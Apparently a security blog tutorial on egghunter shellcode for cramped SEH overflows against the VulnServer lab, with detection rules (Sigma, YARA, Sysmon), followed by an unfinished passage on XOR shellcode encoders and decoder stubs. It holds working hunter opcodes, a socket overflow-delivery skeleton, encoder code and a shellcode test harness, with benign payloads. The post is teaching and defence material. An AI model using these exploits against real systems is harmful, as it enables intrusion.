Egghunters: Staged Payload Delivery When Buffer Space Is Tight
You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward — and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.
An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.
I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.
1. Why Egghunters Exist
The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.
The layout in memory looks like this:
  small overflow buffer (~32-60B)           elsewhere in the process
+---------------------------+          +-----------------------------+
| EGGHUNTER (the "hunter")  | --scan-> | w00tw00t + full shellcode   |
+---------------------------+          +-----------------------------+
  finds the doubled tag, jmp to payload

Two preconditions, both non-negotiable:
- At least ~32 reachable bytes to hold the hunter itself.
- The full payload must already be in memory when the hunter executes.
That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.
2. The Page-Walk Problem
x86 virtual memory is paged in 4 KB (0x1000) chunks. A page is either mapped (readable, possibly more) or unmapped (touching it faults). The egghunter exploits this granularity to scan efficiently and safely.
The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses; it jumps straight to the next page boundary and probes again. Inside a valid page it advances one byte at a time (the same INC EDX) and compares the DWORD at each address against the tag, so an egg at any alignment is found.
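The page arithmetic is easy to check outside a debugger. This is a minimal Python model of the two instructions, not hunter code; the function names are mine, and the 32-bit mask stands in for register width.

```python
PAGE_SIZE = 0x1000  # 4 KB pages on x86


def last_byte_of_page(addr: int) -> int:
    """Model OR DX, 0x0FFF: force the low 12 bits of the address to ones."""
    return (addr | (PAGE_SIZE - 1)) & 0xFFFFFFFF


def next_page(addr: int) -> int:
    """Model OR DX, 0x0FFF followed by INC EDX (wraps at 32 bits)."""
    return (last_byte_of_page(addr) + 1) & 0xFFFFFFFF


for addr in (0x00401234, 0x00401FFF, 0x7FFDE000):
    print(f"{addr:#010x} -> page end {last_byte_of_page(addr):#010x}, "
          f"next page {next_page(addr):#010x}")
```

An address anywhere inside a page maps to the same next-page start, which is why one failed probe is enough to skip all 4096 bytes.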
The brief table of moving parts:
| Component | Detail |
|---|---|
| Memory iterator register | EDX holds the current scan address |
| Page-boundary jump | OR DX, 0x0FFF → end of page; INC EDX → start of next page |
| Validity probe | A syscall (or an SEH frame) tests whether the page is readable |
| Egg comparison | SCASD compares EAX to [EDI] and auto-increments EDI |
| Transfer to payload | JMP EDI once both halves of the egg match |

3. Anatomy of the Syscall Egghunter
The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.
; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
    or   dx, 0x0fff        ; EDX -> last byte of current 4KB page
loop_inc_one:
    inc  edx               ; advance one byte (rolls into next page)
loop_check:
    push edx               ; save scan pointer (clobbered by syscall)
    push 0x2               ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
    pop  eax               ; -> EAX = 0x2   *** verify per OS, see j00ru ***
    int  0x2e              ; legacy syscall gate
    cmp  al, 0x05          ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
    pop  edx               ; restore scan pointer
    je   loop_inc_page     ; bad page -> skip to next page boundary
is_egg:
    mov  eax, 0x74303077   ; "w00t"
    mov  edi, edx          ; EDI = current address
    scasd                  ; compare [EDI] to EAX, EDI += 4
    jnz  loop_inc_one      ; first half mismatch -> keep scanning
    scasd                  ; compare the *second* half of the egg
    jnz  loop_inc_one
matched:
    jmp  edi               ; EDI now points just past the doubled tag

Two SCASD instructions back to back are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves to match makes a false positive vanishingly unlikely, and because SCASD auto-advances EDI, after the second success EDI already points at the byte after the egg, exactly where the payload begins. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically, with only the syscall number differing.
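To see why the doubled tag matters, it helps to replay the comparison logic over a plain byte string. The sketch below is a simplified model, not the hunter itself: memory is a flat bytes object with no unmapped pages, and simulate_hunt is a name I made up for illustration.

```python
import struct


def simulate_hunt(memory: bytes, tag: bytes = b"w00t"):
    """Return the offset the hunter would jump to, or None if no egg is resident."""
    want = struct.unpack("<I", tag)[0]           # the value MOV EAX loads
    for edx in range(len(memory) - 7):           # INC EDX: one byte per step
        first, second = struct.unpack_from("<II", memory, edx)
        if first != want:                        # first SCASD fails
            continue
        if second != want:                       # second SCASD fails
            continue
        return edx + 8                           # EDI after two successful SCASDs
    return None


# A lone tag (as in the hunter's own MOV EAX immediate) sits before the real egg.
lone_tag = b"\xb8w00t\x8b\xfa"
memory = b"\x90" * 16 + lone_tag + b"\x00" * 9 + b"w00tw00t" + b"\xcc"
print(simulate_hunt(memory))
```

The lone copy of the tag is skipped because the second comparison fails, and the returned offset is the first byte after the full eight-byte egg.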
| Identifier | Value / Note |
|---|---|
| Syscall | NtAccessCheckAndAuditAlarm |
| Syscall number (x86 XP–7) | 0x02 |
| Invocation | INT 0x2E |
| Access-violation status | 0xC0000005 → CMP AL, 0x05 |
| Invalid-page action | JE loop_inc_page |
| Size | ~32 bytes |
Syscall numbers are OS-version specific.
0x02 is stable on XP/Vista/7; Windows 10 moved the table and changed the argument layout. Always confirm against Mateusz “j00ru” Jurczyk’s table at j00ru.vexillium.org/syscalls/nt/64/ for your exact target build.
4. The SEH-Based Variant
Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.
; --- SEH-based egghunter (illustrative, ~60 bytes) ---
; Register a handler so a read fault resumes scanning instead of crashing.
    push handler           ; EXCEPTION_REGISTRATION_RECORD.Handler
    push dword [fs:0]      ; .Next = current head of the SEH chain
    mov  [fs:0], esp       ; install our frame as the new chain head
    xor  edx, edx          ; scan pointer
scan_loop:
    inc  edx
    mov  edi, edx
    mov  eax, 0x74303077   ; "w00t"
    scasd                  ; read [EDI]; faults route into 'handler'
    jnz  scan_loop
    scasd                  ; confirm second half of the egg
    jnz  scan_loop
    pop  dword [fs:0]      ; restore previous SEH frame
    add  esp, 4
    jmp  edi               ; transfer to payload
handler:                   ; entered on STATUS_ACCESS_VIOLATION
    ; bump saved EDX in the CONTEXT past the bad page,
    ; return ExceptionContinueExecution, resume scan_loop
    ret

| Feature | Syscall variant | SEH variant |
|---|---|---|
| Size | ~32 bytes | ~60 bytes |
| Validity check | INT 0x2E → NtAccessCheckAndAuditAlarm | Custom FS:[0] handler |
| OS portability | Fragile (syscall # changes) | More portable |
| Detection surface | INT 0x2E is glaring | Quieter, but installs an SEH frame |
That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is — but the syscall hunter’s INT 0x2E is so unused by legitimate user-mode code that flagging it is nearly a free win for the blue team.
![Hierarchy diagram comparing the two classic egghunter variants: the 32-byte syscall hunter using INT 0x2E with OS-specific syscall numbers versus the 60-byte SEH hunter using a custom FS:[0] fault handler with better portability.](https://genxcyber.com/wp-content/uploads/2026/06/egghunter-staged-payload-delivery-tight-buffer-2.png)
5. Egg Tags and Bad Characters
The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.
First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters — \x00, \x0A, \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.
Second, and easy to forget: the doubled tag must be unique in process memory ahead of the payload. A lone 4-byte occurrence is harmless, because the second SCASD fails and the scan moves on (the hunter itself carries one copy in its MOV EAX immediate, which is why the egg is doubled). But if the full 8-byte egg appears at a lower address than your real payload, including a stale or truncated copy of your own crafted buffer, the hunter jumps there first and executes garbage. Scan your buffer before sending:
def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
    egg = tag * 2                                # the real, doubled egg
    first = buffer.find(egg)
    if first == -1:
        print(f"[!] doubled tag {egg!r} not found in buffer")
        return False
    second = buffer.find(egg, first + 1)         # any other doubled hit?
    if second != -1:
        print(f"[!] doubled tag {egg!r} appears at offsets {first} and {second}")
        return False
    return True

The bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.
# Bad-character probe — compare against the in-memory dump in x64dbg/Immunity
allchars = bytes(range(1, 256)) # skip \x00 explicitly, test the rest
probe = b"A" * 66 + b"B" * 4 + allchars
# Any byte that is mangled, truncated, or terminates the string is "bad".

6. WoW64 and Windows 10
Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.
The CS segment selector reveals the mode: 0x23 for 32-bit, 0x33 for 64-bit. The hunter checks it, then calls through FS:[0xC0], the WoW64 transition pointer in the 32-bit TEB, whose target performs the far jump into 64-bit code.
; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
    mov  ebx, cs           ; read code-segment selector
    cmp  bl, 0x23          ; 0x23 = 32-bit (WoW64) execution?
    ; ... stage 64-bit syscall args ...
    mov  bl, 0xc0
    call dword [fs:ebx]    ; indirect call via FS:[0xC0] -> WoW64 transition to 64-bit mode
    cmp  al, 0x05          ; STATUS_ACCESS_VIOLATION low byte
    je   loop_inc_page

The Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly. Verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.
7. Wiring It Into an SEH Overflow
A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.
[ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
... and the egg-tagged full payload lives in a SEPARATE field/request ...

#!/usr/bin/env python3
# LAB ONLY: staged egghunter delivery skeleton (offsets/gadget are placeholders)
import socket

RHOST, RPORT = "192.168.56.20", 9999

egghunter = (  # 32-byte syscall hunter, tag "w00t"
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
nseh = b"\xeb\x06\x90\x90"   # jmp +6 over the SEH record
seh = b"\x42\x42\x42\x42"    # PLACEHOLDER pop/pop/ret (find per target)
egg = b"w00tw00t"            # tag, doubled
payload = egg + b"\x90" * 16 + b"\xcc"   # \xcc = test int3; swap for calc.exe popup in lab

trigger = b"A" * 66 + nseh + seh + egghunter
trigger += b"C" * (1000 - len(trigger))

with socket.create_connection((RHOST, RPORT)) as s:
    s.recv(1024)
    s.send(b"KSTET " + payload + b"\r\n")   # 1) stage the egg-tagged payload first
    s.send(b"KSTET " + trigger + b"\r\n")   # 2) THEN trigger overflow + run hunter
Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.
8. Lab: VulnServer KSTET
VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:
- Attach VulnServer in Immunity Debugger or x64dbg.
- Fuzz KSTET, find the offset to SEH control with a cyclic pattern.
- Locate a clean POP/POP/RET in a non-/SAFESEH, non-ASLR module.
- Generate the hunter with mona: !mona egg -t w00t (add -c to encode out bad chars). Mona can emit both SEH-based and NtAccessCheckAndAuditAlarm-based hunters.
- Set a breakpoint on the SCASD (\xAF) opcode and single-step to watch EDI march toward the egg; this is the moment that makes the mechanism click.
Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.
9. Detecting Egghunter Behavior
The hunter is loud if you’re listening. Two behavioral tells lead:
- A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
- NtAccessCheckAndAuditAlarm fired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.
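The second tell lends itself to a simple sliding-window count. The sketch below assumes you have already exported a syscall trace into time-ordered (timestamp_seconds, thread_id, syscall_name) tuples; that tuple format, the function name, and the window and threshold values are all my assumptions, not the output of any particular ETW tool.

```python
from collections import defaultdict, deque


def find_syscall_bursts(events, name="NtAccessCheckAndAuditAlarm",
                        window_s=1.0, threshold=1000):
    """Return thread IDs that issued `name` at least `threshold` times within `window_s`."""
    recent = defaultdict(deque)   # thread_id -> timestamps still inside the window
    flagged = set()
    for ts, tid, syscall in events:
        if syscall != name:
            continue
        hits = recent[tid]
        hits.append(ts)
        while ts - hits[0] > window_s:   # drop timestamps that aged out
            hits.popleft()
        if len(hits) >= threshold:
            flagged.add(tid)
    return flagged


# Synthetic trace: one thread hammering the call, one calling it occasionally.
NAME = "NtAccessCheckAndAuditAlarm"
noisy = [(i * 0.0001, 4242, NAME) for i in range(5000)]
quiet = [(10.0 + i, 7, NAME) for i in range(5)]
print(find_syscall_bursts(noisy + quiet))
```

Tune the threshold against a baseline of the monitored service first; the defaults here are placeholders.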
| Event ID | Name | Relevance |
|---|---|---|
| 1 | Process Creation | Baseline parent-child chain for the vulnerable service |
| 8 | CreateRemoteThread | Egg payload injecting; StartModule/StartFunction empty when the start address is outside loaded modules, a shellcode tell |
| 10 | ProcessAccess | Cross-process handles requesting PROCESS_VM_WRITE (0x0020), PROCESS_VM_OPERATION (0x0008), PROCESS_CREATE_THREAD (0x0002) |
| 25 | ProcessTampering | Sysmon 13+; in-memory image diverging from disk, a hallmark of in-memory execution |
Default SwiftOnSecurity Sysmon config won’t catch CreateRemoteThread injection out of the box because of kernel32.dll exclusions — tune it before you rely on Event ID 8.
title: Remote Thread Start Address Outside Loaded Modules
id: 5a9d3e21-egg0-4c11-9f0a-shellcodeloader   # placeholder; Sigma expects a real UUID here
status: experimental
logsource:
    product: windows
    category: create_remote_thread   # Sysmon Event ID 8
detection:
    selection:
        StartModule: ''
        StartFunction: ''
    condition: selection
level: high

Pair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688. Command lines show up in 4688 only once the “Include command line in process creation events” policy is also enabled. And flag INT 0x2E in user mode wherever EDR or ETW lets you; it’s about as high-fidelity as indicators get.
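The INT 0x2E indicator can also be checked offline against a raw memory dump. The following is a rough sketch using only the standard library: the pattern encodes the page-walk prefix followed within a few bytes by INT 0x2E and CMP AL, 0x05, the 12-byte gap allowance is my own guess at reasonable slack, and find_syscall_hunters is a hypothetical helper name.

```python
import re

# OR DX,0x0FFF ... (a few setup bytes) ... INT 0x2E ; CMP AL,0x05
HUNTER_RE = re.compile(rb"\x66\x81\xca\xff\x0f.{0,12}?\xcd\x2e\x3c\x05", re.DOTALL)


def find_syscall_hunters(dump: bytes):
    """Return start offsets of byte runs shaped like the 32-byte syscall hunter."""
    return [m.start() for m in HUNTER_RE.finditer(dump)]


# The canonical 32-byte hunter embedded in zero padding stands in for a dump.
sample = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
          b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
dump = b"\x00" * 64 + sample + b"\x00" * 64
print([hex(off) for off in find_syscall_hunters(dump)])
```

An encoded or hand-modified hunter will not match this shape, so treat a miss as inconclusive rather than clean.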
YARA pins the syscall hunter’s opcode signature for memory forensics:
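rule Egghunter_Syscall_x86 {
    meta:
        description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
        author = "GenXCyber"
    strings:
        $page_walk = { 66 81 CA FF 0F }             // or dx, 0x0fff
        $syscall   = { CD 2E }                      // int 0x2e
        $av_check  = { 3C 05 }                      // cmp al, 0x05
        $egg_cmp   = { AF 75 ?? AF 75 ?? FF E7 }    // scasd; jnz; scasd; jnz; jmp edi
    condition:
        // every piece must fall inside the 32 bytes after some page-walk hit
        for any i in (1..#page_walk) : (
            $syscall  in (@page_walk[i]..@page_walk[i] + 32) and
            $av_check in (@page_walk[i]..@page_walk[i] + 32) and
            $egg_cmp  in (@page_walk[i]..@page_walk[i] + 32)
        )
}

10. Tools for Egghunter Analysis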
| Tool | Description | Link |
|---|---|---|
| mona.py | Generates/verifies egghunters (!mona egg) in Immunity | corelan.be |
| Immunity Debugger | Classic exploit-dev debugger, mona host | immunityinc.com |
| x64dbg | Free user-mode debugger for stepping the scan | x64dbg.com |
| VulnServer | Safe, intentionally vulnerable practice target | github.com |
| Process Hacker | Spot the 100% CPU thread and handle access | processhacker.sourceforge.io |
| Sysmon | EID 8/10/25 telemetry for shellcode behavior | microsoft.com |
| j00ru syscall table | Authoritative per-OS syscall numbers | j00ru.vexillium.org |
| osed-scripts (epi052) | Egghunter generator and OSED helpers | github.com |
11. Mitigations and Modern Reality
Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.
| Mitigation | Effect on the technique |
|---|---|
| DEP / NX | Payload on stack/heap won’t execute; primary kill switch for legacy targets |
| ASLR | Hardcoded POP/POP/RET addresses break; forces wider scans → more CPU and ETW noise |
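| Control Flow Guard | Validates indirect call targets in CFG-instrumented code; can block the initial control-flow hijack, but does not police the hunter’s own JMP EDI once shellcode is running |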
| GS / stack canaries | Don’t stop the hunter, but can stop the overflow that delivers it |
| App sandboxing | Limits post-execution blast radius |
The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.
12. MITRE ATT&CK Mapping
Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Service crash/recover, EID 1 anomalies |
| Process Injection | T1055 | Sysmon EID 8/10, TI ETW |
| Process Injection: DLL Injection | T1055.001 | EID 8 with empty StartModule |
| Reflective Code Loading | T1620 | In-memory PE, EID 25 ProcessTampering |
| Obfuscated Files or Information | T1027 | Encoded egg payload, YARA on decoder stubs |
| Sandbox Evasion: Time Based | T1497.003 | CPU-spike artifact in sandboxes |
Summary
- An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
- The hunter walks memory page-by-page (OR DX, 0x0FFF), validates each page via NtAccessCheckAndAuditAlarm/INT 0x2E (or an SEH frame), and confirms the egg with two consecutive SCASD instructions before JMP EDI.
- The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core, which is a behavioral indicator in its own right.
- Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
- Detect it via the INT 0x2E anomaly, rapid NtAccessCheckAndAuditAlarm bursts, Sysmon EID 8 threads with empty StartModule, EID 25 tampering, and a YARA signature on the canonical opcode window, and mitigate upstream with DEP, ASLR, and CFG.
Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.
This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.
1. Why Shellcode Breaks: Bad Characters
A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.
| Byte | Name | Why it breaks things |
|---|---|---|
| \x00 | NULL | Terminates C strings; strcpy/sprintf stop copying here |
| \x0a | Line Feed | Read as end-of-input by line-oriented protocols and gets |
| \x0d | Carriage Return | Paired with \x0a in HTTP/SMTP headers; often stripped |
| \x20 | Space | Token delimiter in many parsers |
| \xff | 0xFF | Sentinel / length markers in some binary protocols |
The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).
2. The XOR Contract
XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.
A ⊕ K ⊕ K = A

| A | K | A ⊕ K |
|---|---|---|
| 0 | 0 | 0 |
| 0 | 1 | 1 |
| 1 | 0 | 1 |
| 1 | 1 | 0 |
There’s no key schedule, no S-box, no state to carry — which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in well under 20 bytes. That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.
The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character — for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. And if the encoded output ever lands on \x00, that’s a bad char too; re-key.
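Both halves of that contract, the round trip and the zero collision, can be confirmed in a few lines. This is a small illustration using the benign exit(0) bytes from Section 4; xor_bytes is my own helper name and 0xAA is an arbitrary example key.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


original = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])  # benign exit(0)
key = 0xAA

encoded = xor_bytes(original, key)
decoded = xor_bytes(encoded, key)          # same operation, same key
print(encoded.hex(), decoded == original)

# A key equal to any payload byte encodes that byte to 0x00.
collides = xor_bytes(original, 0x31)
print(collides.hex())
```

Because x ⊕ x = 0, any key that equals a byte already in the payload is disqualified the moment \x00 is on the bad-char list.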

3. Finding the Bad Chars
Before you encode anything, you enumerate what to avoid. The workflow is mechanical:
- Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
- Drop it into the vulnerable buffer and dump the buffer from memory.
- Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
- Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.
A small diff helper makes step 3 fast:
#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(expected) != len(received):
        return min(len(expected), len(received)), "(truncated)", None
    return None

# expected = bytes(range(0x01, 0x100))       # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the first byte that failed to arrive (the one at the returned index in what you sent) is usually the terminator. Note it, exclude it, run again.
4. Building an XOR Encoder in Python
The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.
#!/usr/bin/env python3
# XOR shellcode encoder: teaching / authorized-lab use only.
# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key    = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob   = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean: you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.
5. The Decoder Stub in x86 (NASM)
The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.
section .text
global _start
_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL
decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode
get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back
payload:
    db 0xcc, 0xcc, 0xcc        ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.
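Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len keeps only the low byte of anything over 255 (the assembler gives you a warning at most), so a 300-byte payload decodes only its first 44 bytes (300 mod 256) and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, keep the xor ecx, ecx and load the 16-bit register instead: mov cx, payload_len. A full mov ecx, payload_len counts correctly, but its 32-bit immediate carries zero bytes for any realistic length, which reintroduces the \x00 you were encoding around. The 16-bit form has the same problem only when one of the two length bytes happens to be zero.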
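The arithmetic behind that failure is worth checking before assembling anything. A small sketch, with helper names of my own choosing, that shows what each counter-loading form actually ends up with:

```python
def counter_loaded_by_mov_cl(payload_len: int) -> int:
    """MOV CL, imm8 keeps only the low eight bits of the length."""
    return payload_len & 0xFF


def imm_has_null(payload_len: int, width_bytes: int) -> bool:
    """True if the little-endian immediate of that width contains a 0x00 byte."""
    return 0 in payload_len.to_bytes(width_bytes, "little")


for n in (8, 255, 256, 300, 0x0101):
    print(f"len={n:4d}  cl={counter_loaded_by_mov_cl(n):3d}  "
          f"imm16 null={imm_has_null(n, 2)}  imm32 null={imm_has_null(n, 4)}")
```

Note the 256 case: CL becomes 0, and since LOOP decrements before it tests, a zero counter does not skip the loop but wraps ECX around and runs it roughly four billion times.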
Build and extract:
nasm -f elf32 stub.asm -o stub.o
ld -m elf_i386 stub.o -o stub
objdump -d stub # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                 # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM, never on your host, never networked:
/* LAB ONLY — disposable VM, no network.
gcc -m32 -z execstack -fno-stack-protector test.c -o test */
#include <stdio.h>
unsigned char buf[] =
"\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
"\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
    printf("stub length: %zu\n", sizeof(buf) - 1);
    ((void(*)())buf)();
    return 0;
}
6. The Stub Must Be Clean Too
This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.
So audit the stub bytes the same way you audit everything else:
#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax → \x29\xc0, which zeroes the register just as well. Same trick rescues xor ecx, ecx (\x31\xc9 → sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.
7. Per-Chunk Keyed Encoding
When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.
; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
decode_chunk:
    mov  al, [esi]             ; AL = key for this chunk
    inc  esi                   ; ESI -> first data byte
    xor  byte [esi], al        ; decode data byte 0
    inc  esi
